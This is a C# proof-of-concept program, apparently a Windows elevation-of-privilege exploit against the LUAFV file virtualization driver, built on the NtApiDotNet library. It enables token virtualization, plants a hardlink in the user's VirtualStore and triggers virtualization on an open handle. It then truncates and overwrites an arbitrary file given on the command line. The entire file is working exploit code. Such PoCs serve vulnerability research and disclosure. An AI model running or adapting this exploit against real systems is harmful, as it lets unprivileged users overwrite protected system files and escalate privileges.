﻿using NtApiDotNet;
using System;
using System.IO;
using System.Security.AccessControl;
using System.Text;

namespace PoC_LUAFV_DesiredAccess_EoP
{
    class Program
    {
        static void CreateFileWithSecurity(string target_path, string sddl, string data)
        {
            SecurityDescriptor sd = new SecurityDescriptor(sddl);
            using (var obja = new ObjectAttributes(target_path, AttributeFlags.CaseInsensitive, (NtObject)null, null, sd))
            {
                using (var file = NtFile.Create(obja,
                        FileAccessRights.WriteData, 0, 0, FileOpenOptions.NonDirectoryFile, FileDisposition.Create, null))
                {
                    if (!string.IsNullOrEmpty(data))
                    {
                        file.Write(Encoding.ASCII.GetBytes(data), 0);
                    }
                    Console.WriteLine("Created Target Path: {0}", target_path);
                }
            }
        }

        static void CreateVirtualStoreFile(string target_path, string overwrite_path)
        {
            string base_path = target_path.Substring(target_path.IndexOf(':') + 2);
            string virtual_path = Path.Combine(
                Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), 
                "VirtualStore", base_path);
            Directory.CreateDirectory(Path.GetDirectoryName(virtual_path));

            NtFile.CreateHardlink(NtFileUtils.DosFileNameToNt(overwrite_path), NtFileUtils.DosFileNameToNt(virtual_path));
        }

        static void OpenFileForVirtualization(string overwrite_path)
        {
            // Setup the file path.
            string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
            Console.WriteLine("Base Path: {0}", base_path);
            DirectorySecurity dir_sd = new DirectorySecurity();
            dir_sd.SetSecurityDescriptorSddlForm("D:(D;;DT;;;WD)(A;;GA;;;WD)");
            Directory.CreateDirectory(base_path, dir_sd);
            string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, "dummy.txt"));

            CreateFileWithSecurity(target_path, "D:(A;;GR;;;WD)(A;;GA;;;BA)(A;;0;;;OW)", "012345678");
            using (var token = NtToken.OpenProcessToken())
            {
                token.VirtualizationEnabled = true;
            }

            using (var file = NtFile.Create(target_path, null, FileAccessRights.MaximumAllowed | FileAccessRights.Delete, 
                0, FileShareMode.Read, FileOpenOptions.NonDirectoryFile, FileDisposition.OpenIf, null))
            {
                Console.WriteLine("{0} {1}", NtProcess.Current.ProcessId, file.Handle.DangerousGetHandle());
                Console.WriteLine("{0} {1}", file.FullPath, file.GrantedAccess);
                Console.WriteLine("Length before: {0}", file.Length);
                CreateVirtualStoreFile(target_path, overwrite_path);
                file.FsControl(NtWellKnownIoControlCodes.FSCTL_GET_COMPRESSION, new byte[0], 0, false);
                Console.WriteLine("{0} {1}", file.FullPath, file.GrantedAccess);
                Console.WriteLine("Length after: {0}", file.Length);
                file.Length = 0;
                Console.WriteLine("Written: {0}", file.Write(Encoding.ASCII.GetBytes("FAKE CONTENT\r\n"), 0));
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Specify a file to overwrite");
                    return;
                }
                OpenFileForVirtualization(Path.GetFullPath(args[0]));
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
